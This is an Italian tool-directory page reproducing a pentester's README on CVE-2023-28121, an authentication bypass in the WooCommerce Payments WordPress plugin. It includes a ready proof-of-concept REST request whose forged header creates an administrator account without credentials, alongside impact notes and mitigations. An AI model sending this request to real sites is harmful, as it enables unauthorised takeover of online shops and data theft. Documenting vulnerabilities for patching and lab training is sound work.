Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — Sfruttamento pratico di una vulnerabilità critica in WordPress usando il plugin WooCommerce Payments. | Kitploit
Strumenti/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
luisdevpentest/cve-2023-28121-wordpress-privilege-escalation

CVE-2023-28121-WordPress-Privilege-Escalation

Sfruttamento pratico di una vulnerabilità critica in WordPress usando il plugin WooCommerce Payments.

Vedi Repository
114 mesi faNon ancora revisionato

🔐 CVE-2023-28121 — Escalation dei privilegi WordPress

Esplorazione pratica di una vulnerabilità critica in WordPress utilizzando il plugin WooCommerce Payments.


📌 Riepilogo

La CVE-2023-28121 consente di creare utenti amministratori senza autenticazione tramite API REST.

  • Severità: Critica (CVSS 9.8)
  • Impatto: Controllo totale del sito
  • Tipo: Bypass dell'autenticazione / Escalation dei privilegi
  • Oltre 600.000 installazioni attive - Marzo 2023 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 Il plugin interessato ha centinaia di migliaia di installazioni ed è ampiamente utilizzato negli e-commerce.


🎥 Dimostrazione

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ Come funziona

Il sistema accetta un header manipolabile:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

Con questo, è possibile inviare una richiesta per la creazione di utenti con privilegi elevati senza autenticazione valida.


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ Risultato: creazione di utente admin


🔥 Impatto

  • Creazione di amministratore
  • Accesso al pannello /wp-admin
  • Possibile takeover completo
  • Rischio di frode e fuga di dati

🛠️ Mitigazione

  • Aggiornare il plugin alla versione corretta
  • Limitare l'accesso all'API REST
  • Validare correttamente l'autenticazione

🧱 Ambiente

  • WordPress (lab locale)
  • WooCommerce Payments (versione vulnerabile)

📚 Riferimenti

  • CVE-2023-28121
  • Documentazione API REST WordPress
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 Autore

Luis Eduardo .M.B.S.R

Pentester / Sicurezza Web

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ Disclaimer

Uso educativo in ambiente controllato. Non mi assumo la responsabilità di come tale conoscenza venga utilizzata da terzi.


Scarica lo strumento